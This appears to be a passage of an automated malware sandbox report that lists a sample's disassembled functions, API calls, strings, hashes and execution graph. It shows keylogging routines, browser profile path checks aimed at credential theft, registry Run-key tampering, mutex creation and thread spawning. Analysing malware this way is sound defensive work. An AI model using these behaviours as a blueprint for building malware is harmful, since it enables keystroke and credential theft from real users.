                                      • Opcode ID: aa04110589378f695a926f37751ec12dd355a1c518c8e37f574f7fcf9075e706
                                      • Instruction ID: bc80f26c20518f1537303c50f7754149ec59903bf949c5bd7a670fdcca2d871f
                                      • Opcode Fuzzy Hash: aa04110589378f695a926f37751ec12dd355a1c518c8e37f574f7fcf9075e706
                                      • Instruction Fuzzy Hash: 2FF08221900219969606B7F8DC8A8FF7F7E9F10741B4001E6A606A31D2EF649D45CAE1
                                      Function 02B0C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 02B0C5BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: AppData$\Opera Software\Opera Stable\
                                      • API String ID: 1174141254-1629609700
                                      • Opcode ID: 50383cbf803e04a0fde321343a91bce8a4fb05f18c926d416cd5dd8e70321a34
                                      • Instruction ID: 06b6ca3ff862379778c842763050a7c903785a143be5e780c17e8edd829f57ac
                                      • Opcode Fuzzy Hash: 50383cbf803e04a0fde321343a91bce8a4fb05f18c926d416cd5dd8e70321a34
                                      • Instruction Fuzzy Hash: FBF08C21A40319969A16F7F8DC8ACFF7F7E9F10701B4001E6A606A30D2EF649985CAE1
                                      Function 02B0C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 02B0C559
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                      • API String ID: 1174141254-2800177040
                                      • Opcode ID: a5013449ad21387855addd31acdbfaf2b0a7b535580e8d1f6ed6aa56bb2c02d4
                                      • Instruction ID: 2ec6ca5c31124bca59cb8714999577b4e8ef03fd879b28d2ed12f817700e5730
                                      • Opcode Fuzzy Hash: a5013449ad21387855addd31acdbfaf2b0a7b535580e8d1f6ed6aa56bb2c02d4
                                      • Instruction Fuzzy Hash: 38F08221D00219969A16B7F8DC8A8FF7F7D9F10701B0045E6A606A31D2EF649981CAE1
                                      Function 02B0B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyState.USER32(00000011), ref: 02B0B64B
                                        • Part of subcall function 02B0A3E0: GetForegroundWindow.USER32 ref: 02B0A416
                                        • Part of subcall function 02B0A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 02B0A422
                                        • Part of subcall function 02B0A3E0: GetKeyboardLayout.USER32(00000000), ref: 02B0A429
                                        • Part of subcall function 02B0A3E0: GetKeyState.USER32(00000010), ref: 02B0A433
                                        • Part of subcall function 02B0A3E0: GetKeyboardState.USER32(?), ref: 02B0A43E
                                        • Part of subcall function 02B0A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 02B0A461
                                        • Part of subcall function 02B0A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 02B0A4C1
                                        • Part of subcall function 02B0A636: SetEvent.KERNEL32(?,?,00000000,02B0B20A,00000000), ref: 02B0A662
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                      • String ID: [AltL]$[AltR]
                                      • API String ID: 2738857842-2658077756
                                      • Opcode ID: ac7722c5c1c522ae62066d3c5de4b38cd7aa9325273ba6f478aed3955a89514c
                                      • Instruction ID: 533832eacad8125abc285dc0a126617ba4e8012903498219fe0d9f59398d3021
                                      • Opcode Fuzzy Hash: ac7722c5c1c522ae62066d3c5de4b38cd7aa9325273ba6f478aed3955a89514c
                                      • Instruction Fuzzy Hash: 46E09B2174031053982E327D59AE7BD7E56C742654B8145CDFA434B6C8DD8E4D1587C2
                                      Function 02B0B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyState.USER32(00000012), ref: 02B0B6A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: State
                                      • String ID: [CtrlL]$[CtrlR]
                                      • API String ID: 1649606143-2446555240
                                      • Opcode ID: f79b275d74642c62a4c4a59487a4cdd30caafcd0b88f6eda305a8070f6b85767
                                      • Instruction ID: 83d8948c2dd22330761296c7a0ccc7066d852bed2dbd407ebb9961928a50ff91
                                      • Opcode Fuzzy Hash: f79b275d74642c62a4c4a59487a4cdd30caafcd0b88f6eda305a8070f6b85767
                                      • Instruction Fuzzy Hash: 91E0CD21B0031053D53A36BD569F77C7F15DB42698F4105CDF9438B6D9DE4A851047C2
                                      Function 02B13A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,02B0D144,00000000,02B752D8,02B752F0,?,pth_unenc), ref: 02B13A31
                                      • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 02B13A45
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 02B13A2F
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteOpenValue
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                      • API String ID: 2654517830-1051519024
                                      • Opcode ID: 0e2eb2e0d87a54ace1307695b948c4d01a15afac7bdd7b5c402d809055379cae
                                      • Instruction ID: ffe9baa99cb7897608ca060e4312414ee7d5f59b4b647786dbe52cd85d66fe54
                                      • Opcode Fuzzy Hash: 0e2eb2e0d87a54ace1307695b948c4d01a15afac7bdd7b5c402d809055379cae
                                      • Instruction Fuzzy Hash: 57E0C23169421CFBDF104F71DC06FBE37ACDB02B40F000AD4BA0696080D7629A1496A0
                                      Function 02B0B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 02B0B876
                                      • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 02B0B8A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteDirectoryFileRemove
                                      • String ID: pth_unenc
                                      • API String ID: 3325800564-4028850238
                                      • Opcode ID: 1aba857c6d0d7db95b20c12b0120f4b75fe14c57bce7083d4a512fa9a9cae35b
                                      • Instruction ID: 5829d8de33c1dcfef98c6d9b8741ac369d66e754a8f286701e0d6c32043c0c0f
                                      • Opcode Fuzzy Hash: 1aba857c6d0d7db95b20c12b0120f4b75fe14c57bce7083d4a512fa9a9cae35b
                                      • Instruction Fuzzy Hash: 26E08C32550B208BCB1AAB388888BD7779DAF10355B00099AD4D7D3590DF65E809DAA0
                                      Function 02B12850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • TerminateProcess.KERNEL32(00000000,pth_unenc,02B0F8C8), ref: 02B12860
                                      • WaitForSingleObject.KERNEL32(000000FF), ref: 02B12873
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ObjectProcessSingleTerminateWait
                                      • String ID: pth_unenc
                                      • API String ID: 1872346434-4028850238
                                      • Opcode ID: eb407bc792d6f5f868ea9c96625cfc6d3792d11fc0301e6df15ee1eaee1a7be3
                                      • Instruction ID: 2c0f575fccde9449f21d9be807159c006c6c4834e46f8e7eac32f58bc3254b04
                                      • Opcode Fuzzy Hash: eb407bc792d6f5f868ea9c96625cfc6d3792d11fc0301e6df15ee1eaee1a7be3
                                      • Instruction Fuzzy Hash: 97D012749C9362EFEB350B60EE4DB043B98A7057E1F140A06FC61572F0C766443CEA51
                                      Function 02B40C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,02B01D55), ref: 02B40D27
                                      • GetLastError.KERNEL32 ref: 02B40D35
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02B40D90
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 1717984340-0
                                      • Opcode ID: 9b5c48f9bda6204426fb7353f01406973a033de85d053f25b6692685ca8c74b1
                                      • Instruction ID: 14fd1700e468ff6c09463ef25a14705f52a4b5c4c83f7d131141d158701063e0
                                      • Opcode Fuzzy Hash: 9b5c48f9bda6204426fb7353f01406973a033de85d053f25b6692685ca8c74b1
                                      • Instruction Fuzzy Hash: E6411931500215EFCF29AF64C8C47BA7BB4EF41314F1089D9EE545B191DF329905EB90
                                      Function 02B11B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                      Download Yara Rule
                                      APIs
                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 02B11B8C
                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 02B11C58
                                      • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02B11C7A
                                      • SetLastError.KERNEL32(0000007E,02B11EF0), ref: 02B11C91
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastRead
                                      • String ID:
                                      • API String ID: 4100373531-0
                                      • Opcode ID: 7f6f1801a6213404aa62bdbb872805deb8c0d7631782f26e6d7d3c6e8dec359d
                                      • Instruction ID: 6cb19e83cd455599fa2272f1ff6cb6ce00da6532673af90ff1585a1869135d72
                                      • Opcode Fuzzy Hash: 7f6f1801a6213404aa62bdbb872805deb8c0d7631782f26e6d7d3c6e8dec359d
                                      • Instruction Fuzzy Hash: AE419675604306DFEB248F18D884B66B3E8FF48714F4408ADEA8ACB651EB31E804DB51

                                      Execution Graph

                                      Execution Coverage:1.2%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:556
                                      Total number of Limit Nodes:10
                                      execution_graph 46622 2a34887 46623 2a34893 ___DestructExceptionObject 46622->46623 46648 2a34596 46623->46648 46626 2a3489a 46627 2a348c3 46626->46627 46944 2a349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 46626->46944 46635 2a34902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46627->46635 46945 2a44251 5 API calls _ValidateLocalCookies 46627->46945 46629 2a348dc 46631 2a348e2 ___DestructExceptionObject 46629->46631 46946 2a441f5 5 API calls _ValidateLocalCookies 46629->46946 46632 2a34962 46659 2a34b14 46632->46659 46635->46632 46947 2a433e7 35 API calls 5 library calls 46635->46947 46643 2a3498e 46645 2a34997 46643->46645 46948 2a433c2 28 API calls _abort 46643->46948 46949 2a3470d 13 API calls 2 library calls 46645->46949 46649 2a3459f 46648->46649 46950 2a34c52 IsProcessorFeaturePresent 46649->46950 46651 2a345ab 46951 2a38f31 10 API calls 4 library calls 46651->46951 46653 2a345b0 46654 2a345b4 46653->46654 46952 2a440bf 46653->46952 46654->46626 46657 2a345cb 46657->46626 47018 2a36e90 46659->47018 46662 2a34968 46663 2a441a2 46662->46663 47020 2a4f059 46663->47020 46665 2a34971 46668 2a0e9c5 46665->46668 46666 2a441ab 46666->46665 47024 2a46815 35 API calls 46666->47024 47026 2a1cb50 LoadLibraryA GetProcAddress 46668->47026 46670 2a0e9e1 GetModuleFileNameW 47031 2a0f3c3 46670->47031 46672 2a0e9fd 47046 2a020f6 46672->47046 46675 2a020f6 28 API calls 46676 2a0ea1b 46675->46676 47052 2a1be1b 46676->47052 46680 2a0ea2d 47078 2a01e8d 46680->47078 46682 2a0ea36 46683 2a0ea93 46682->46683 46684 2a0ea49 46682->46684 47084 2a01e65 22 API calls 46683->47084 47108 2a0fbb3 95 API calls 46684->47108 46687 2a0eaa3 47085 2a01e65 22 API calls 46687->47085 46688 2a0ea5b 47109 2a01e65 22 API calls 46688->47109 46690 2a0ea67 47110 2a10f37 36 API calls __EH_prolog 46690->47110 46692 2a0eac2 47086 2a0531e 28 API calls 46692->47086 46695 2a0ead1 47087 2a06383 28 API calls 46695->47087 46696 2a0ea79 47111 2a0fb64 77 API calls 46696->47111 46699 2a0eadd 47088 2a01fe2 46699->47088 46700 2a0ea82 47112 2a0f3b0 70 API calls 46700->47112 46705 2a01fd8 11 API calls 46708 2a0eefb 46705->46708 46707 2a01fd8 11 API calls 46709 2a0eafb 46707->46709 46939 2a432f6 GetModuleHandleW 46708->46939 47100 2a01e65 22 API calls 46709->47100 46711 2a0eb04 47101 2a01fc0 28 API calls 46711->47101 46713 2a0eb0f 47102 2a01e65 22 API calls 46713->47102 46715 2a0eb28 47103 2a01e65 22 API calls 46715->47103 46717 2a0eb43 46718 2a0ebae 46717->46718 47113 2a06c1e 28 API calls 46717->47113 47104 2a01e65 22 API calls 46718->47104 46721 2a0eb70 46722 2a01fe2 28 API calls 46721->46722 46723 2a0eb7c 46722->46723 46726 2a01fd8 11 API calls 46723->46726 46724 2a0ec02 47105 2a0d069 46724->47105 46725 2a0ebbb 46725->46724 47115 2a13549 RegOpenKeyExA RegQueryValueExA RegCloseKey 46725->47115 46727 2a0eb85 46726->46727 47114 2a13549 RegOpenKeyExA RegQueryValueExA RegCloseKey 46727->47114 46729 2a0ec08 46731 2a0ea8b 46729->46731 47117 2a1b2c3 33 API calls 46729->47117 46731->46705 46734 2a0eba4 46734->46718 46736 2a0f34f 46734->46736 46735 2a0ec23 46738 2a0ec76 46735->46738 47118 2a07716 RegOpenKeyExA RegQueryValueExA RegCloseKey 46735->47118 47200 2a139a9 30 API calls 46736->47200 46737 2a0ebe6 46737->46724 47116 2a139a9 30 API calls 46737->47116 47123 2a01e65 22 API calls 46738->47123 46743 2a0f365 47201 2a12475 65 API calls ___scrt_get_show_window_mode 46743->47201 46744 2a0ec7f 46752 2a0ec90 46744->46752 46753 2a0ec8b 46744->46753 46745 2a0ec3e 46747 2a0ec42 46745->46747 46748 2a0ec4c 46745->46748 47119 2a07738 30 API calls 46747->47119 47121 2a01e65 22 API calls 46748->47121 47125 2a01e65 22 API calls 46752->47125 47124 2a07755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 46753->47124 46754 2a0ec47 47120 2a07260 97 API calls 46754->47120 46756 2a0f37f 47203 2a13a23 RegOpenKeyExW RegDeleteValueW 46756->47203 46759 2a0ec99 47126 2a1bc5e 28 API calls 46759->47126 46761 2a0ec55 46761->46738 46765 2a0ec71 46761->46765 46762 2a0eca4 47127 2a01f13 28 API calls 46762->47127 47122 2a07260 97 API calls 46765->47122 46766 2a0f392 47204 2a01f09 11 API calls 46766->47204 46767 2a0ecaf 47128 2a01f09 11 API calls 46767->47128 46771 2a0f39c 47205 2a01f09 11 API calls 46771->47205 46772 2a0ecb8 47129 2a01e65 22 API calls 46772->47129 46775 2a0f3a5 47206 2a0dd42 27 API calls 46775->47206 46776 2a0ecc1 47130 2a01e65 22 API calls 46776->47130 46778 2a0f3aa 47207 2a14f2a 167 API calls 46778->47207 46782 2a0ecdb 47131 2a01e65 22 API calls 46782->47131 46784 2a0ecf5 47132 2a01e65 22 API calls 46784->47132 46786 2a0ed80 46789 2a0ed8a 46786->46789 46795 2a0ef06 ___scrt_get_show_window_mode 46786->46795 46787 2a0ed0e 46787->46786 47133 2a01e65 22 API calls 46787->47133 46790 2a0ed93 46789->46790 46798 2a0ee0f 46789->46798 47139 2a01e65 22 API calls 46790->47139 46792 2a0ed9c 47140 2a01e65 22 API calls 46792->47140 46793 2a0ed23 _wcslen 46793->46786 47134 2a01e65 22 API calls 46793->47134 47150 2a136f8 RegOpenKeyExA RegQueryValueExA RegCloseKey 46795->47150 46797 2a0edae 47141 2a01e65 22 API calls 46797->47141 46806 2a0ee0a ___scrt_get_show_window_mode 46798->46806 46799 2a0ed3e 46800 2a0ed45 46799->46800 47135 2a01e65 22 API calls 46800->47135 46804 2a0edc0 47142 2a01e65 22 API calls 46804->47142 46805 2a0ed53 47136 2a0da34 31 API calls 46805->47136 46806->46798 47145 2a13947 31 API calls 46806->47145 46807 2a0ef51 47151 2a01e65 22 API calls 46807->47151 46811 2a0ed66 47137 2a01f13 28 API calls 46811->47137 46812 2a0ede9 47143 2a01e65 22 API calls 46812->47143 46813 2a0ef76 47152 2a02093 28 API calls 46813->47152 46817 2a0ed72 47138 2a01f09 11 API calls 46817->47138 46818 2a0edfa 47144 2a0cdf9 45 API calls _wcslen 46818->47144 46819 2a0ef88 47153 2a1376f 14 API calls 46819->47153 46821 2a0ed7b 46821->46786 46825 2a0eea3 ctype 47146 2a01e65 22 API calls 46825->47146 46826 2a0ef9e 47154 2a01e65 22 API calls 46826->47154 46828 2a0efaa 47155 2a3baac 39 API calls _swprintf 46828->47155 46831 2a0efb7 46833 2a0efe4 46831->46833 47156 2a1cd9b 86 API calls ___scrt_get_show_window_mode 46831->47156 46832 2a0eeba 46832->46807 47147 2a01e65 22 API calls 46832->47147 47157 2a02093 28 API calls 46833->47157 46836 2a0eed7 47148 2a1bc5e 28 API calls 46836->47148 46837 2a0efc8 CreateThread 46837->46833 47315 2a1d45d 10 API calls 46837->47315 46840 2a0eff9 47158 2a02093 28 API calls 46840->47158 46841 2a0eee3 47149 2a0f474 103 API calls 46841->47149 46844 2a0f008 47159 2a1b4ef 79 API calls 46844->47159 46845 2a0eee8 46845->46807 46847 2a0eeef 46845->46847 46847->46731 46848 2a0f00d 47160 2a01e65 22 API calls 46848->47160 46850 2a0f019 47161 2a01e65 22 API calls 46850->47161 46852 2a0f02b 47162 2a01e65 22 API calls 46852->47162 46854 2a0f04b 47163 2a3baac 39 API calls _swprintf 46854->47163 46856 2a0f058 47164 2a01e65 22 API calls 46856->47164 46858 2a0f063 47165 2a01e65 22 API calls 46858->47165 46860 2a0f074 47166 2a01e65 22 API calls 46860->47166 46862 2a0f089 47167 2a01e65 22 API calls 46862->47167 46864 2a0f09a 46865 2a0f0a1 StrToIntA 46864->46865 47168 2a09de4 169 API calls _wcslen 46865->47168 46867 2a0f0b3 47169 2a01e65 22 API calls 46867->47169 46869 2a0f101 47178 2a01e65 22 API calls 46869->47178 46870 2a0f0bc 46870->46869 47170 2a344ea 46870->47170 46875 2a0f0e4 46878 2a0f0eb CreateThread 46875->46878 46876 2a0f159 47180 2a01e65 22 API calls 46876->47180 46877 2a0f111 46877->46876 46879 2a344ea new 22 API calls 46877->46879 46878->46869 47318 2a19fb4 102 API calls __EH_prolog 46878->47318 46881 2a0f126 46879->46881 47179 2a01e65 22 API calls 46881->47179 46883 2a0f138 46886 2a0f13f CreateThread 46883->46886 46884 2a0f1cc 47186 2a01e65 22 API calls 46884->47186 46885 2a0f162 46885->46884 47181 2a01e65 22 API calls 46885->47181 46886->46876 47316 2a19fb4 102 API calls __EH_prolog 46886->47316 46889 2a0f17e 47182 2a01e65 22 API calls 46889->47182 46890 2a0f1d5 46891 2a0f21a 46890->46891 47187 2a01e65 22 API calls 46890->47187 47191 2a1b60d 79 API calls 46891->47191 46894 2a0f193 47183 2a0d9e8 31 API calls 46894->47183 46896 2a0f1ea 47188 2a01e65 22 API calls 46896->47188 46897 2a0f223 47192 2a01f13 28 API calls 46897->47192 46899 2a0f22e 47193 2a01f09 11 API calls 46899->47193 46903 2a0f1a6 47184 2a01f13 28 API calls 46903->47184 46904 2a0f237 CreateThread 46909 2a0f264 46904->46909 46910 2a0f258 CreateThread 46904->46910 47317 2a0f7a7 120 API calls 46904->47317 46905 2a0f1ff 47189 2a3baac 39 API calls _swprintf 46905->47189 46908 2a0f1b2 47185 2a01f09 11 API calls 46908->47185 46912 2a0f279 46909->46912 46913 2a0f26d CreateThread 46909->46913 46910->46909 47319 2a120f7 137 API calls 46910->47319 46917 2a0f2cc 46912->46917 47194 2a02093 28 API calls 46912->47194 46913->46912 47313 2a126db 38 API calls ___scrt_get_show_window_mode 46913->47313 46915 2a0f1bb CreateThread 46915->46884 47314 2a01be9 49 API calls 46915->47314 46916 2a0f20c 47190 2a0c162 7 API calls 46916->47190 47196 2a134ff RegOpenKeyExA RegQueryValueExA RegCloseKey 46917->47196 46920 2a0f29c 47195 2a052fd 28 API calls 46920->47195 46924 2a0f2e4 46924->46775 47197 2a1bc5e 28 API calls 46924->47197 46929 2a0f2fd 47198 2a1361b 31 API calls 46929->47198 46933 2a0f313 47199 2a01f09 11 API calls 46933->47199 46935 2a0f346 DeleteFileW 46936 2a0f34d 46935->46936 46937 2a0f31e 46935->46937 47202 2a1bc5e 28 API calls 46936->47202 46937->46935 46937->46936 46938 2a0f334 Sleep 46937->46938 46938->46937 46940 2a34984 46939->46940 46940->46643 46941 2a4341f 46940->46941 47321 2a4319c 46941->47321 46944->46626 46945->46629 46946->46635 46947->46632 46948->46645 46949->46631 46950->46651 46951->46653 46956 2a4fb68 46952->46956 46955 2a38f5a 8 API calls 3 library calls 46955->46654 46959 2a4fb85 46956->46959 46960 2a4fb81 46956->46960 46958 2a345bd 46958->46657 46958->46955 46959->46960 46962 2a49ca6 46959->46962 46974 2a34fcb 46960->46974 46963 2a49cb2 ___DestructExceptionObject 46962->46963 46981 2a45888 EnterCriticalSection 46963->46981 46965 2a49cb9 46982 2a50183 46965->46982 46967 2a49cc8 46968 2a49cd7 46967->46968 46993 2a49b3a 23 API calls 46967->46993 46995 2a49cf3 LeaveCriticalSection std::_Lockit::~_Lockit 46968->46995 46971 2a49cd2 46994 2a49bf0 GetStdHandle GetFileType 46971->46994 46972 2a49ce8 ___DestructExceptionObject 46972->46959 46975 2a34fd6 IsProcessorFeaturePresent 46974->46975 46976 2a34fd4 46974->46976 46978 2a35018 46975->46978 46976->46958 47017 2a34fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46978->47017 46980 2a350fb 46980->46958 46981->46965 46983 2a5018f ___DestructExceptionObject 46982->46983 46984 2a501b3 46983->46984 46985 2a5019c 46983->46985 46996 2a45888 EnterCriticalSection 46984->46996 47004 2a405dd 20 API calls __dosmaperr 46985->47004 46988 2a501eb 47005 2a50212 LeaveCriticalSection std::_Lockit::~_Lockit 46988->47005 46989 2a501bf 46989->46988 46997 2a500d4 46989->46997 46991 2a501a1 ___DestructExceptionObject __cftoe 46991->46967 46993->46971 46994->46968 46995->46972 46996->46989 47006 2a45af3 46997->47006 46999 2a500f3 47014 2a46782 20 API calls __dosmaperr 46999->47014 47001 2a50145 47001->46989 47003 2a500e6 47003->46999 47013 2a48a84 11 API calls 2 library calls 47003->47013 47004->46991 47005->46991 47007 2a45b00 ___crtLCMapStringA 47006->47007 47008 2a45b40 47007->47008 47009 2a45b2b RtlAllocateHeap 47007->47009 47015 2a42f80 7 API calls 2 library calls 47007->47015 47016 2a405dd 20 API calls __dosmaperr 47008->47016 47009->47007 47011 2a45b3e 47009->47011 47011->47003 47013->47003 47014->47001 47015->47007 47016->47011 47017->46980 47019 2a34b27 GetStartupInfoW 47018->47019 47019->46662 47021 2a4f062 47020->47021 47023 2a4f06b 47020->47023 47025 2a4ef58 48 API calls 5 library calls 47021->47025 47023->46666 47024->46666 47025->47023 47027 2a1cb8f LoadLibraryA GetProcAddress 47026->47027 47028 2a1cb7f GetModuleHandleA GetProcAddress 47026->47028 47029 2a1cbb8 44 API calls 47027->47029 47030 2a1cba8 LoadLibraryA GetProcAddress 47027->47030 47028->47027 47029->46670 47030->47029 47208 2a1b4a8 FindResourceA 47031->47208 47035 2a0f3ed _Yarn 47218 2a020b7 47035->47218 47038 2a01fe2 28 API calls 47039 2a0f413 47038->47039 47040 2a01fd8 11 API calls 47039->47040 47041 2a0f41c 47040->47041 47042 2a3bd51 _Yarn 21 API calls 47041->47042 47043 2a0f42d _Yarn 47042->47043 47224 2a06dd8 47043->47224 47045 2a0f460 47045->46672 47047 2a0210c 47046->47047 47048 2a023ce 11 API calls 47047->47048 47049 2a02126 47048->47049 47050 2a02569 28 API calls 47049->47050 47051 2a02134 47050->47051 47051->46675 47261 2a020df 47052->47261 47054 2a1be2e 47057 2a1bea0 47054->47057 47066 2a01fe2 28 API calls 47054->47066 47069 2a01fd8 11 API calls 47054->47069 47073 2a1be9e 47054->47073 47265 2a041a2 28 API calls 47054->47265 47266 2a1ce34 47054->47266 47055 2a01fd8 11 API calls 47056 2a1bed0 47055->47056 47058 2a01fd8 11 API calls 47056->47058 47277 2a041a2 28 API calls 47057->47277 47059 2a1bed8 47058->47059 47062 2a01fd8 11 API calls 47059->47062 47064 2a0ea24 47062->47064 47063 2a1beac 47065 2a01fe2 28 API calls 47063->47065 47074 2a0fb17 47064->47074 47067 2a1beb5 47065->47067 47066->47054 47068 2a01fd8 11 API calls 47067->47068 47070 2a1bebd 47068->47070 47069->47054 47071 2a1ce34 28 API calls 47070->47071 47071->47073 47073->47055 47075 2a0fb23 47074->47075 47077 2a0fb2a 47074->47077 47303 2a02163 11 API calls 47075->47303 47077->46680 47080 2a02163 47078->47080 47079 2a0219f 47079->46682 47080->47079 47304 2a02730 11 API calls 47080->47304 47082 2a02184 47305 2a02712 11 API calls std::_Deallocate 47082->47305 47084->46687 47085->46692 47086->46695 47087->46699 47089 2a01ff1 47088->47089 47096 2a02039 47088->47096 47090 2a023ce 11 API calls 47089->47090 47091 2a01ffa 47090->47091 47092 2a02015 47091->47092 47093 2a0203c 47091->47093 47306 2a03098 28 API calls 47092->47306 47307 2a0267a 11 API calls 47093->47307 47097 2a01fd8 47096->47097 47098 2a023ce 11 API calls 47097->47098 47099 2a01fe1 47098->47099 47099->46707 47100->46711 47101->46713 47102->46715 47103->46717 47104->46725 47308 2a01fab 47105->47308 47107 2a0d073 CreateMutexA GetLastError 47107->46729 47108->46688 47109->46690 47110->46696 47111->46700 47113->46721 47114->46734 47115->46737 47116->46724 47117->46735 47118->46745 47119->46754 47120->46748 47121->46761 47122->46738 47123->46744 47124->46752 47125->46759 47126->46762 47127->46767 47128->46772 47129->46776 47130->46782 47131->46784 47132->46787 47133->46793 47134->46799 47135->46805 47136->46811 47137->46817 47138->46821 47139->46792 47140->46797 47141->46804 47142->46812 47143->46818 47144->46806 47145->46825 47146->46832 47147->46836 47148->46841 47149->46845 47150->46807 47151->46813 47152->46819 47153->46826 47154->46828 47155->46831 47156->46837 47157->46840 47158->46844 47159->46848 47160->46850 47161->46852 47162->46854 47163->46856 47164->46858 47165->46860 47166->46862 47167->46864 47168->46867 47169->46870 47174 2a344ef 47170->47174 47171 2a3bd51 _Yarn 21 API calls 47171->47174 47172 2a0f0d1 47177 2a01e65 22 API calls 47172->47177 47174->47171 47174->47172 47309 2a42f80 7 API calls 2 library calls 47174->47309 47310 2a34c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47174->47310 47311 2a3526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47174->47311 47177->46875 47178->46877 47179->46883 47180->46885 47181->46889 47182->46894 47183->46903 47184->46908 47185->46915 47186->46890 47187->46896 47188->46905 47189->46916 47190->46891 47191->46897 47192->46899 47193->46904 47194->46920 47196->46924 